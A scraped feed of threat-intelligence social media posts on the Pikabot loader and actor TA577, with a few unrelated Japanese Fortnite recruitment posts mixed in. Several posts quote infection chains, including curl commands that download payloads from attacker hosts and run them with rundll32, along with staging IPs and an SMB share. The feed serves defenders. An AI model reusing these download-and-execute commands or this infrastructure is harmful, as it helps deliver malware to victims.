Pikabot 2.0

#Pikabot #TA577 malspam spotted in #Italy 🇮🇹

EML(Thread Hijacking)>.iso>.exe>cmd.exe curl>.png (.dll)>ctfmon.exe -p 1234

Trend Micro, Inc.

🔗Staging
s://yourunitedlaws,com/mrD/8372

🦸 #SigmaHQ release r2024-01-29 is here.

🌟7 New Rules
🛡️30 Rule updates
🔬11 Rule Fixes

This release includes

- #Pikabot uncommon DLL loading and updates to older Pikabot related rules.
- CodePage modification via the built-in MODE utility as seen in the wild.
- CLI and

#Pikabot malspam spotted in #Italy 🇮🇹

Back to 'classic' TTPs

EML(Thread Hijacked with modified stolen old conv)>.zip>.js (curl)>.dat>.exe>ctfmon.exe

デュオ固定1
進行igl出来る方
雰囲気いい方お願いします！
200＄です！
#フォートナイト大会募集

🎙️ On #PIVOTcon24 stage we have now Selena & Konstantin Klinger telling the saga of #TA577 - distributor of #Qbot and #Pikabot . Interesting tips for tracking being shared 💪

#PIVOTcon24 #CTI #ThreatIntel

#Pikabot #TA577 malspam spotted in #Italy 🇮🇹

🔥new TTPs

EML(stolen old conv)>.zip(psw protect)>👉.jar>filename.exe>ctfmon.exe

ctfmon.exe -p 123

🔴 We are live

Join us for the conclusion to our #PikaBot emulation series 👾

twitch.tv/oalabslive

ThreatLabz has released an IDA plugin to deobfuscate the strings for previous versions of #Pikabot .

Read our blog here: zscaler.com/blogs/security…

The source code for the IDA plugin can be found here: github.com/threatlabz/pik…

⚠️TA577 starts spreading #Pikabot #malware

eml>.zip>.html(link)

html files with 0 detections on Virustotal and decoy latin words
🔥staging ip:
204.44.125.68
103.124.104.76
103.124.104.22
66.63.188.19
104.129.20.167

#infosecurity #CyberAttack

A new #Pikabot sample added to the collection ⚡️🤖

✅ OneDrive branded PDF lure
✅ Heavily-obfuscated Zipped JScript Download
✅ Curl and Rundll32 for next-stage DLL download and execution

Test your defences now: delivr.to/payloads?id=a2…

🧵

🚨 Beware of Pikabot #malware ! This sneaky loader malware appeared in 2023 and keeps evolving. Now in its latest version as of February 2024, #Pikabot poses a serious threat with anti-analysis features and flexible capabilities.

Learn more 👇
any.run/malware-trends…

We've updated the vx-underground malware families collection

- AgentTesla
- Amadey
- Android.Chameleon
- Android.WyrmSpy
- AsyncRAT
- AveMaria
- DarkGateLoader
- GootLoader
- INCRansomware
- IPStorm
- LummaStealer
- Nanocore
- Pikabot
- RecordBreaker
- Remcos
- Stealc

#Pikabot - .iso > .exe > .dll > .curl > .dll

T1574 - DLL Search Order Hijacking

Open_Document.exe - 'Microsoft Write'

cmd /c md c:\wnd

curl -o c:\wnd\3291.png --url https://yourunitedlaws.]com/mrD/4462

rundll32 c:\wnd\3291.png,GetModuleProp

IOC's
github.com/pr0xylife/Pika…

This is #pikabot
#SMB
\\85.195.115.]20\share

#Pikabot #Malware 06.03.24

🔥IoC List: pastebin.com/H0zap0mv

⚙️analysis: app.any.run/tasks/23d5e351…

#infosec #CyberSec

👇
x.com/Tac_Mangusta/s…

鯖メンバー募集 メイン鯖にできる人 ある程度常識ある人 いっぱい練習してます良ければ来てほしいです
3V3や4V4とかやりたいです
#フォートナイト #メンバー募集中 #身内鯖募集

🚨 #Alert : #SysWhispers2 ( #directsyscalls / #indirectsyscalls ) uncovered in #Pikabot & #QBot

🔎 VMRay Labs identified #SysWhispers2 in #Pikabot samples. This evasion technique for #AVs & #EDRs is a well-known open-source framework whose usage we've tracked back to #QBot

🧵

#Pikabot - #TA577 - .zip > .js > curl > .exe

#Signed - A.P.Hernandez

wscript ION.js

cmd /c mkdir C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh

curl http://103.124.105.]147/KNaDVX/99.dat -o C:\Dthfgjhjfj\Rkfjsil\Ejkjhdgjf\Byfjgkgdfh\jda.exe

(1/3)👇

IOC's
github.com/pr0xylife/Pika…

⚠️ This week, threat actor #TA577 introduced a rather interesting new approach to distribute their #Pikabot malware. Victim users received an #Excel spreadsheet prompting them to click on the contained button to view 'files from the cloud'. 🧵1/4